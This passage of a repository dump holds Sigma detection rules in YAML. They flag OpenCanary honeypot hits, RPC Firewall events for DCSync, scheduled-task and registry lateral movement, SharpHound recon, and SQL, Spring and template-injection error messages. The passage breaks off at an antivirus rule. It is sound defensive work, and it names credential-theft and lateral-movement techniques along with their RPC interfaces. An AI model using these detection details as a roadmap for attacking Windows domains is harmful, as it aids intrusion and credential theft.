    "path": "rules/application/opencanary/opencanary_tftp_request.yml",
    "content": "title: OpenCanary - TFTP Request\nid: b4e6b016-a2ac-4759-ad85-8000b300d61e\nstatus: test\ndescription: Detects instances where a TFTP service on an OpenCanary node has had a request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.exfiltration\n    - attack.t1041\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 10001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_vnc_connection_attempt.yml",
    "content": "title: OpenCanary - VNC Connection Attempt\nid: 9db5446c-b44a-4291-8b89-fcab5609c3b3\nstatus: test\ndescription: Detects instances where a VNC service on an OpenCanary node has had a connection attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.lateral-movement\n    - attack.t1021\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 12001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/python/app_python_sql_exceptions.yml",
    "content": "title: Python SQL Exceptions\nid: 19aefed0-ffd4-47dc-a7fc-f8b1425e84f9\nstatus: stable\ndescription: Generic rule for SQL exceptions in Python according to PEP 249\nreferences:\n    - https://www.python.org/dev/peps/pep-0249/#exceptions\nauthor: Thomas Patzke\ndate: 2017-08-12\nmodified: 2020-09-01\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: python\ndetection:\n    keywords:\n        - DataError\n        - IntegrityError\n        - ProgrammingError\n        - OperationalError\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: medium\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml",
    "content": "title: Remote Schedule Task Lateral Movement via ATSvc\nid: 0fcd1c79-4eeb-4746-aba9-1b458f7a79cb\nstatus: test\ndescription: Detects remote RPC calls to create or execute a scheduled task via ATSvc\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.privilege-escalation\n    - attack.lateral-movement\n    - attack.execution\n    - attack.persistence\n    - attack.t1053\n    - attack.t1053.002\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b\n        OpNum:\n            - 0\n            - 1\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml",
    "content": "title: Remote Schedule Task Recon via ATSvc\nid: f177f2bc-5f3e-4453-b599-57eefce9a59c\nstatus: test\ndescription: Detects remote RPC calls to read information about scheduled tasks via ATSvc\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b\n    filter:\n        OpNum:\n            - 0\n            - 1\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml",
    "content": "title: Possible DCSync Attack\nid: 56fda488-113e-4ce9-8076-afc2457922c3\nstatus: test\ndescription: Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.t1033\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes, enable DRSR UUID (e3514235-4b06-11d1-ab04-00c04fc2dcd2) for \"dangerous\" opcodes (not 0,1 or 12) only from trusted IPs (DCs)'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: e3514235-4b06-11d1-ab04-00c04fc2dcd2\n    filter:\n        OpNum:\n            - 0\n            - 1\n            - 12\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml",
    "content": "title: Remote Encrypting File System Abuse\nid: 5f92fff9-82e2-48eb-8fc1-8b133556a551\nstatus: test\ndescription: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.lateral-movement\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:df1941c5-fe89-4e79-bf10-463657acf44d or c681d488-d850-11d0-8c52-00c04fd90f7e'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid:\n            - df1941c5-fe89-4e79-bf10-463657acf44d\n            - c681d488-d850-11d0-8c52-00c04fd90f7e\n    condition: selection\nfalsepositives:\n    - Legitimate usage of remote file encryption\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml",
    "content": "title: Remote Event Log Recon\nid: 2053961f-44c7-4a64-b62d-f6e72800af0d\nstatus: test\ndescription: Detects remote RPC calls to get event log information via EVEN or EVEN6\nreferences:\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:82273fdc-e32a-18c3-3f78-827929dc23ea and uuid:f6beaff7-1e19-4fbb-9f8f-b89e2018337c\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid:\n            - 82273fdc-e32a-18c3-3f78-827929dc23ea\n            - f6beaff7-1e19-4fbb-9f8f-b89e2018337c\n    condition: selection\nfalsepositives:\n    - Remote administrative tasks on Windows Events\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml",
    "content": "title: Remote Schedule Task Lateral Movement via ITaskSchedulerService\nid: ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d\nstatus: test\ndescription: Detects remote RPC calls to create or execute a scheduled task\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1053\n    - attack.t1053.002\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c\n        OpNum:\n            - 1\n            - 3\n            - 4\n            - 10\n            - 11\n            - 12\n            - 13\n            - 14\n            - 15\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml",
    "content": "title: Remote Schedule Task Recon via ITaskSchedulerService\nid: 7f7c49eb-2977-4ac8-8ab0-ab1bae14730e\nstatus: test\ndescription: Detects remote RPC calls to read information about scheduled tasks\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c\n    filter:\n        OpNum:\n            - 1\n            - 3\n            - 4\n            - 10\n            - 11\n            - 12\n            - 13\n            - 14\n            - 15\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml",
    "content": "title: Remote Printing Abuse for Lateral Movement\nid: bc3a4b0c-e167-48e1-aa88-b3020950e560\nstatus: test\ndescription: Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.lateral-movement\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:12345678-1234-abcd-ef00-0123456789ab or 76f03f96-cdfd-44fc-a22c-64950a001209 or ae33069b-a2a8-46ee-a235-ddfd339be281 or 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid:\n            - 12345678-1234-abcd-ef00-0123456789ab\n            - 76f03f96-cdfd-44fc-a22c-64950a001209\n            - 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1\n            - ae33069b-a2a8-46ee-a235-ddfd339be281\n    condition: selection\nfalsepositives:\n    - Actual printing\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml",
    "content": "title: Remote DCOM/WMI Lateral Movement\nid: 68050b10-e477-4377-a99b-3721b422d6ef\nstatus: test\ndescription: Detects remote RPC calls that perform remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.lateral-movement\n    - attack.execution\n    - attack.t1021.003\n    - attack.t1047\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:367abb81-9844-35f1-ad32-98f038001003'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid:\n            - 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57\n            - 99fcfec4-5260-101b-bbcb-00aa0021347a\n            - 000001a0-0000-0000-c000-000000000046\n            - 00000131-0000-0000-c000-000000000046\n            - 00000143-0000-0000-c000-000000000046\n            - 00000000-0000-0000-c000-000000000046\n    condition: selection\nfalsepositives:\n    - Some administrative tasks on remote host\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml",
    "content": "title: Remote Registry Lateral Movement\nid: 35c55673-84ca-4e99-8d09-e334f3c29539\nstatus: test\ndescription: Detects remote RPC calls to modify the registry and possibly execute code\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1112\n    - attack.persistence\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003\n        OpNum:\n            - 6\n            - 7\n            - 8\n            - 13\n            - 18\n            - 19\n            - 21\n            - 22\n            - 23\n            - 35\n    condition: selection\nfalsepositives:\n    - Remote administration of registry values\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml",
    "content": "title: Remote Registry Recon\nid: d8ffe17e-04be-4886-beb9-c1dd1944b9a8\nstatus: test\ndescription: Detects remote RPC calls to collect information\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003\n    filter:\n        OpNum:\n            - 6\n            - 7\n            - 8\n            - 13\n            - 18\n            - 19\n            - 21\n            - 22\n            - 23\n            - 35\n    condition: selection and not filter\nfalsepositives:\n    - Remote administration of registry values\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml",
    "content": "title: Remote Server Service Abuse\nid: b6ea3cc7-542f-43ef-bbe4-980fbed444c7\nstatus: test\ndescription: Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.lateral-movement\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188\n    condition: selection\nfalsepositives:\n    - Legitimate remote share creation\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml",
    "content": "title: Remote Server Service Abuse for Lateral Movement\nid: 10018e73-06ec-46ec-8107-9172f1e04ff2\nstatus: test\ndescription: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.lateral-movement\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:367abb81-9844-35f1-ad32-98f038001003'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 367abb81-9844-35f1-ad32-98f038001003\n    condition: selection\nfalsepositives:\n    - Administrative tasks on remote services\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml",
    "content": "title: Remote Schedule Task Lateral Movement via SASec\nid: aff229ab-f8cd-447b-b215-084d11e79eb0\nstatus: test\ndescription: Detects remote RPC calls to create or execute a scheduled task via SASec\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.privilege-escalation\n    - attack.lateral-movement\n    - attack.execution\n    - attack.persistence\n    - attack.t1053\n    - attack.t1053.002\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f\n        OpNum:\n            - 0\n            - 1\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml",
    "content": "title: Recon Activity via SASec\nid: 0a3ff354-93fc-4273-8a03-1078782de5b7\nstatus: test\ndescription: Detects remote RPC calls to read information about scheduled tasks via SASec\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f\n    filter:\n        OpNum:\n            - 0\n            - 1\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml",
    "content": "title: SharpHound Recon Account Discovery\nid: 65f77b1e-8e79-45bf-bb67-5988a8ce45a5\nstatus: test\ndescription: Detects remote RPC calls used by SharpHound to map remote connections and local group membership.\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.t1087\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:6bffd098-a112-3610-9833-46c3f87e345a opnum:2'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 6bffd098-a112-3610-9833-46c3f87e345a\n        OpNum: 2\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml",
    "content": "title: SharpHound Recon Sessions\nid: 6d580420-ff3f-4e0e-b6b0-41b90c787e28\nstatus: test\ndescription: Detects remote RPC calls used by SharpHound to map remote connections and local group membership.\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188 opnum:12'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188\n        OpNum: 12\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/ruby/appframework_ruby_on_rails_exceptions.yml",
    "content": "title: Ruby on Rails Framework Exceptions\nid: 0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a\nstatus: stable\ndescription: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts\nreferences:\n    - http://edgeguides.rubyonrails.org/security.html\n    - http://guides.rubyonrails.org/action_controller_overview.html\n    - https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception\n    - https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb\nauthor: Thomas Patzke\ndate: 2017-08-06\nmodified: 2020-09-01\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: ruby_on_rails\ndetection:\n    keywords:\n        - ActionController::InvalidAuthenticityToken\n        - ActionController::InvalidCrossOriginRequest\n        - ActionController::MethodNotAllowed\n        - ActionController::BadRequest\n        - ActionController::ParameterMissing\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: medium\n"
  },
  {
    "path": "rules/application/spring/spring_application_exceptions.yml",
    "content": "title: Spring Framework Exceptions\nid: ae48ab93-45f7-4051-9dfe-5d30a3f78e33\nstatus: stable\ndescription: Detects suspicious Spring framework exceptions that could indicate exploitation attempts\nreferences:\n    - https://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html\nauthor: Thomas Patzke\ndate: 2017-08-06\nmodified: 2020-09-01\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: spring\ndetection:\n    keywords:\n        - AccessDeniedException\n        - CsrfException\n        - InvalidCsrfTokenException\n        - MissingCsrfTokenException\n        - CookieTheftException\n        - InvalidCookieException\n        - RequestRejectedException\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: medium\n"
  },
  {
    "path": "rules/application/spring/spring_spel_injection.yml",
    "content": "title: Potential SpEL Injection In Spring Framework\nid: e9edd087-89d8-48c9-b0b4-5b9bb10896b8\nstatus: test\ndescription: Detects potential SpEL Injection exploitation, which may lead to RCE.\nreferences:\n    - https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: spring\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'org.springframework.expression.ExpressionException'\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: high\n"
  },
  {
    "path": "rules/application/sql/app_sqlinjection_errors.yml",
    "content": "title: Suspicious SQL Error Messages\nid: 8a670c6d-7189-4b1c-8017-a417ca84a086\nstatus: test\ndescription: Detects SQL error messages that indicate probing for an injection attack\nreferences:\n    - http://www.sqlinjection.net/errors\nauthor: Bjoern Kimminich\ndate: 2017-11-27\nmodified: 2023-02-12\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: sql\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL ERROR and above)'\ndetection:\n    keywords:\n        # Oracle\n        - quoted string not properly terminated\n        # MySQL\n        - You have an error in your SQL syntax\n        # SQL Server\n        - Unclosed quotation mark\n        # SQLite\n        - 'near \"*\": syntax error'\n        - SELECTs to the left and right of UNION do not have the same number of result columns\n    condition: keywords\nfalsepositives:\n    - A syntax error in MySQL also occurs in non-dynamic (safe) queries if there is an empty in() clause, which may often be the case.\nlevel: high\n"
  },
  {
    "path": "rules/application/velocity/velocity_ssti_injection.yml",
    "content": "title: Potential Server Side Template Injection In Velocity\nid: 16c86189-b556-4ee8-b4c7-7e350a195a4f\nstatus: test\ndescription: Detects exceptions in the Velocity template renderer; this most likely happens due to dynamic rendering of user input and may lead to RCE.\nreferences:\n    - https://antgarsil.github.io/posts/velocity/\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: velocity\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'ParseErrorException'\n        - 'VelocityException'\n        - 'TemplateInitException'\n    condition: keywords\nfalsepositives:\n    - Application bugs\n    - Missing .vm files\nlevel: high\n"
  },
  {
    "path": "rules/category/antivirus/av_exploiting.yml",
